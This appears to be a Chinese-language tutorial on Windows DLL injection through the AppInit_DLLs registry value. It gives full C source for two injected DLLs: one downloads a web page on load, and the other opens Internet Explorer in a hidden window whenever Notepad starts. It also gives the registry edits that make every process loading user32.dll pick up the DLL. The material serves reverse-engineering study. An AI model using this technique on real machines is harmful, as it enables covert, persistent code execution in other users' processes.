系統資料庫中預設提供了AppInit_Dlls與LoadAppInit_Dlls兩個系統資料庫項
在系統資料庫編輯器中,将要注入的DLL路徑字元串寫入AppInit_Dlls項目,然後把LoadAppInit_Dlls項目值設定為1,重新開機後,指定DLL會注入所有運作程序。
工作原理:User32.dll被加載到程序是,會讀取AppInit_DLLs系統資料庫項,若有值,則調用LoadLibrary()API加載使用者DLL,是以,嚴格的說,想應DLL并不會被加載到所有程序,而隻是加載user32.dll的程序,Windows Xp忽略LoadAppInit.DLLs項。
例:寫入DLL
#include "windows.h"
#include "tchar.h"
#pragma comment(lib, "urlmon.lib")
#define DEF_URL (L"http://www.naver.com/index.html")
#define DEF_FILE_NAME (L"index.html")
HMODULE g_hMod = NULL;
DWORD WINAPI ThreadProc(LPVOID lParam)
{
TCHAR szPath[_MAX_PATH] = {0,};
if( !GetModuleFileName( g_hMod, szPath, MAX_PATH ) )
return FALSE;
TCHAR *p = _tcsrchr( szPath, '\\' );
if( !p )
return FALSE;
_tcscpy_s(p+1, _MAX_PATH, DEF_FILE_NAME);
URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
HANDLE hThread = NULL;
g_hMod = (HMODULE)hinstDLL;
switch( fdwReason )
{
case DLL_PROCESS_ATTACH :
OutputDebugString(L"<myhack.dll> Injection!!!");
hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
CloseHandle(hThread);
break;
}
return TRUE;
}
#define DEF_CMD L"C:\\Program Files\\Internet Explorer\\iexplore.exe"
#define DEF_ADDR L"http://www.baidu.com"
#define DEF_DST_PROC L"notepad.exe"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
TCHAR szCmd[MAX_PATH] = { 0, };
TCHAR szPath[MAX_PATH] = { 0, };
TCHAR *p = NULL;
STARTUPINFO si = { 0, };
PROCESS_INFORMATION pi = { 0, };
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
if (!GetModuleFileName(NULL,szPath,MAX_PATH))
{
break;
}
if (!(p=_tcsrchr(szPath,'\\')))
{
break;
}
if (_tcsicmp(p+1,DEF_DST_PROC))
{
break;
}
wsprintf(szCmd, L"%s %s",DEF_CMD,DEF_ADDR);
if (!CreateProcess(NULL,(LPTSTR)(LPCTSTR)szCmd,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi))
{
break;
}
if (pi.hProcess!=NULL)
{
CloseHandle(pi.hProcess);
}
break;
return TRUE;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
運作系統資料庫編輯器regedit.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVerion\Windows
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNvwVZ2x2bzNXak9CX90TQNNkRrFlQKBTSvwFbslmZvwFMwQzLcVmepNHdu9mZvwFVywUNMZTY18CX052bm9CXz0EVPhXTE50MNpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2LcRHelR3LcJzLctmch1mclRXY39TO1kDOxgTMzIDMyYDM4EDMy8CX0Vmbu4GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.jpg)
修改AppInit_DLLs表項值,輸入dll完整路徑
修改LoadAppInit_DLLs資料為1
重新開機生效,檢視所用加載user32.dll的程序,發現都被注入
當加載notepad.exe時,隐藏模式運作IE,通路網址